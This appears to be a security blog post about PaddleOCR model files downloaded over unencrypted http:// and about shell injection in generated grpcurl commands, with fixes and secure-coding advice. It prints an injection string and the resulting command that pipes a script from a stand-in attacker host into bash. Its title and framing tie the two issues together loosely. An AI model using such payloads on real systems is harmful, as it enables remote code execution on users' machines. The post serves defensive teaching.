Shell Injection via Unsafe String Concatenation in gRPCurl Command Generation
Introduction
When we think about application security, we often focus on the obvious attack surfaces — login forms, API endpoints, user inputs. But some of the most dangerous vulnerabilities hide in plain sight: in configuration files, in helper scripts, and in the small decisions developers make when wiring systems together.
This post examines a high-severity vulnerability found in PaddleOCR's deployment configuration — specifically, the use of unencrypted http:// URLs for downloading machine learning model files. While this might seem like a minor oversight, the consequences can be severe: a network-positioned attacker can silently replace legitimate model files with malicious ones, potentially turning your OCR pipeline into a backdoor.
We'll also explore the broader context of shell injection via unsafe string concatenation in gRPCurl command generation — a related attack pattern that developers working with gRPC tooling must understand.
The Vulnerability Explained
What Went Wrong?
The vulnerability lives in deploy/hubserving/ocr_system/params.py, the configuration module for PaddleOCR's serving infrastructure. The original code specified model download URLs using plain http://:
# VULNERABLE: Unencrypted HTTP download URLs
cfg.det_model_url = "http://paddle-ocr-models.bj.bcebos.com/dygraph_v2.0/ch/ch_pp-ocrv2_det_infer.tar"
cfg.rec_model_url = "http://paddle-ocr-models.bj.bcebos.com/dygraph_v2.0/ch/ch_pp-ocrv2_rec_infer.tar"
cfg.cls_model_url = "http://paddle-ocr-models.bj.bcebos.com/dygraph_v2.0/ch/ch_ppocr_mobile_v2.0_cls_infer.tar"
At the same time, the related gRPCurl command generation code uses unsafe string concatenation to build shell commands from user-controlled values — including headers, endpoints, and data pulled from API responses — without any shell escaping. This means an attacker who can influence those values can inject shell metacharacters.
Two Vulnerabilities, One Root Cause: Insufficient Input Handling
These two issues share a common theme: trusting external data without sanitization or secure transport.
-
HTTP model downloads — No encryption means no integrity. Anyone on the same network (coffee shop Wi-Fi, shared cloud VPC, compromised router) can perform a Man-in-the-Middle (MitM) attack.
-
Shell injection in gRPCurl commands — When user-controlled strings from API responses are interpolated directly into shell command strings, attackers can break out of the intended command structure.
How Could It Be Exploited?
Attack Scenario 1: Model File Poisoning via HTTP MitM
Imagine a developer or automated CI/CD pipeline running PaddleOCR's model download script on a shared cloud network:
Developer Machine ──HTTP──► [ATTACKER in the middle] ──► Model Server
│
▼
Serves malicious .tar file
containing backdoored model
Because the download uses plain http://, there is:
- No encryption — the attacker can read the traffic
- No integrity check at the transport layer — the attacker can modify the response
- No certificate validation — the client has no way to verify the server's identity
The attacker serves a .tar file that, when extracted, contains a model file crafted to exploit deserialization vulnerabilities, or a __init__.py that executes arbitrary code when the model is loaded.
Attack Scenario 2: Shell Injection via gRPCurl Command Generation
Consider a helper function that builds a grpcurl command for users to copy and run:
# VULNERABLE pattern (illustrative)
def build_grpcurl_command(endpoint, header, data):
cmd = f"grpcurl -H '{header}' -d '{data}' {endpoint} service.Method"
return cmd
If data comes from an API response or user input and contains:
'; curl http://attacker.com/shell.sh | bash; echo '
The generated command becomes:
grpcurl -H 'Authorization: Bearer token' -d ''; curl http://attacker.com/shell.sh | bash; echo '' endpoint service.Method
When the user pastes and runs this command, arbitrary code executes on their machine.
Real-World Impact
| Risk | Description |
|---|---|
| Model Integrity | Poisoned models can produce incorrect OCR results, enabling fraud or bypassing security checks |
| Code Execution | Malicious model files can execute code during loading via unsafe deserialization |
| Supply Chain Attack | Compromised models distributed to all users of the system |
| Shell Code Execution | Injected shell commands run with the privileges of the user who pastes the gRPCurl command |
The Fix
What Changed?
The fix is elegantly simple — all three model download URLs were upgraded from http:// to https://:
- cfg.det_model_url = "http://paddle-ocr-models.bj.bcebos.com/dygraph_v2.0/ch/ch_pp-ocrv2_det_infer.tar"
- cfg.rec_model_url = "http://paddle-ocr-models.bj.bcebos.com/dygraph_v2.0/ch/ch_pp-ocrv2_rec_infer.tar"
- cfg.cls_model_url = "http://paddle-ocr-models.bj.bcebos.com/dygraph_v2.0/ch/ch_ppocr_mobile_v2.0_cls_infer.tar"
+ cfg.det_model_url = "https://paddle-ocr-models.bj.bcebos.com/dygraph_v2.0/ch/ch_pp-ocrv2_det_infer.tar"
+ cfg.rec_model_url = "https://paddle-ocr-models.bj.bcebos.com/dygraph_v2.0/ch/ch_pp-ocrv2_rec_infer.tar"
+ cfg.cls_model_url = "https://paddle-ocr-models.bj.bcebos.com/dygraph_v2.0/ch/ch_ppocr_mobile_v2.0_cls_infer.tar"
Why This Works
HTTPS provides three critical security properties that HTTP lacks:
- Confidentiality — TLS encryption prevents eavesdropping on the download
- Integrity — TLS's MAC (Message Authentication Code) detects tampering in transit
- Authentication — Certificate validation ensures you're talking to the real server, not an impersonator
Fixing Shell Injection: The Right Approach
For the gRPCurl command generation issue, the fix requires proper shell escaping. Here's how to do it safely in Python:
import shlex
# SAFE: Use shlex.quote() to escape all user-controlled values
def build_grpcurl_command(endpoint, header, data):
safe_header = shlex.quote(header)
safe_data = shlex.quote(data)
safe_endpoint = shlex.quote(endpoint)
cmd = f"grpcurl -H {safe_header} -d {safe_data} {safe_endpoint} service.Method"
return cmd
shlex.quote() wraps the string in single quotes and escapes any single quotes within the string, making it impossible for shell metacharacters to break out of their intended context.
Even better — avoid shell commands entirely when possible:
import subprocess
# BEST: Use subprocess with a list of arguments (no shell=True)
def run_grpcurl(endpoint, header, data):
result = subprocess.run(
["grpcurl", "-H", header, "-d", data, endpoint, "service.Method"],
capture_output=True,
text=True,
shell=False # Never use shell=True with user input
)
return result.stdout
When you pass a list of arguments to subprocess.run() with shell=False, the OS handles argument separation directly — there is no shell to inject into.
Prevention & Best Practices
1. Always Use HTTPS for Downloading Artifacts
This is a non-negotiable baseline for any production system:
# ❌ Never do this
url = "http://example.com/model.tar"
# ✅ Always do this
url = "https://example.com/model.tar"
Go further by also verifying checksums after download:
import hashlib
import requests
def download_and_verify(url: str, expected_sha256: str, dest_path: str):
response = requests.get(url, stream=True)
response.raise_for_status()
sha256 = hashlib.sha256()
with open(dest_path, 'wb') as f:
for chunk in response.iter_content(chunk_size=8192):
f.write(chunk)
sha256.update(chunk)
actual = sha256.hexdigest()
if actual != expected_sha256:
raise ValueError(f"Checksum mismatch! Expected {expected_sha256}, got {actual}")
return dest_path
2. Never Use String Concatenation for Shell Commands
| Approach | Safety | Recommendation |
|---|---|---|
os.system(f"cmd {user_input}") |
❌ Dangerous | Never use |
subprocess.run(cmd_string, shell=True) |
❌ Dangerous | Avoid with user input |
subprocess.run([...], shell=False) |
✅ Safe | Preferred |
shlex.quote() + string |
⚠️ Acceptable | Use when list form isn't possible |
3. Treat All External Data as Untrusted
Values from API responses, configuration files, environment variables, and network responses should all be treated as potentially hostile:
# Validate and sanitize before use
import re
def validate_endpoint(endpoint: str) -> str:
# Only allow valid hostname:port patterns
pattern = r'^[a-zA-Z0-9.-]+:\d{1,5}$'
if not re.match(pattern, endpoint):
raise ValueError(f"Invalid endpoint format: {endpoint}")
return endpoint
4. Security Scanning Tools
Integrate these tools into your CI/CD pipeline to catch these issues automatically:
- Bandit — Python security linter that detects
shell=True, HTTP URLs, and other issues - Safety — Checks Python dependencies for known vulnerabilities
- Semgrep — Static analysis with rules for shell injection, insecure URLs, and more
- Trivy — Container and filesystem scanning for misconfigurations
# Run Bandit on your codebase
pip install bandit
bandit -r deploy/ -ll
# Example output for this vulnerability:
# >> Issue: [B310:urllib_urlopen] Audit url open for permitted schemes.
# Allowing use of file:/ or custom schemes is often unexpected.
# Severity: Medium Confidence: High
5. Relevant Security Standards
- CWE-78: Improper Neutralization of Special Elements used in an OS Command (OS Command Injection)
- CWE-319: Cleartext Transmission of Sensitive Information
- OWASP A03:2021: Injection — covers shell injection and command injection
- OWASP A02:2021: Cryptographic Failures — covers insecure HTTP transmission
Conclusion
This vulnerability is a reminder that security is in the details. Two characters — changing http to https — stand between a secure model download pipeline and a potential supply chain attack. Similarly, one function call — shlex.quote() or switching to subprocess.run() with a list — is the difference between a safe CLI helper and a remote code execution vector.
Key Takeaways
- 🔒 Always use HTTPS for downloading any external files, especially binary artifacts like ML models
- 🧹 Never concatenate user-controlled strings into shell commands — use
shlex.quote()or argument lists - 🔍 Treat all external data as untrusted, including API response values used in command generation
- 🤖 Automate security scanning with tools like Bandit and Semgrep to catch these patterns in CI/CD
- ✅ Verify checksums of downloaded files to add a second layer of integrity protection beyond TLS
Security isn't about writing perfect code — it's about building habits and systems that make the secure choice the easy choice. Upgrading a URL scheme and using proper escaping functions are exactly the kind of small, high-impact changes that make software meaningfully safer.
Stay secure, and keep shipping. 🛡️